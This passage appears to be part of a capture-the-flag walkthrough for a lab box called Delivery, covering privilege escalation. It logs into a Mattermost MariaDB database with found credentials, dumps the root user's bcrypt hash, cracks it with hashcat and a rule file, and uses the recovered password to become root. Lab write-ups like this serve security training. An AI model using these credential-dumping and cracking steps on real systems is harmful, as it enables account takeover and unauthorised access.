4 :3306 mysql > privesc

mysql -u mmuser -p
Crack_The_MM_Admin_PW

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 86
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
2 rows in set (0.000 sec)


MariaDB [(none)]> show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
| -REDACTED LIST-        |
| Users                  |
+------------------------+

MariaDB [mattermost]> select Username, Password from Users where Username = 'root';
+----------+--------------------------------------------------------------+
| Username | Password                                                     |
+----------+--------------------------------------------------------------+
| root     | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+----------+--------------------------------------------------------------+
1 row in set (0.000 sec)
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO

$ hashcat -a 0 -m 3200 hash pass.txt -r /usr/share/hashcat/rules/best64.rule
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

maildeliverer@Delivery:~$ su root
Password:
root@Delivery:/home/maildeliverer# whoami
root

Last updated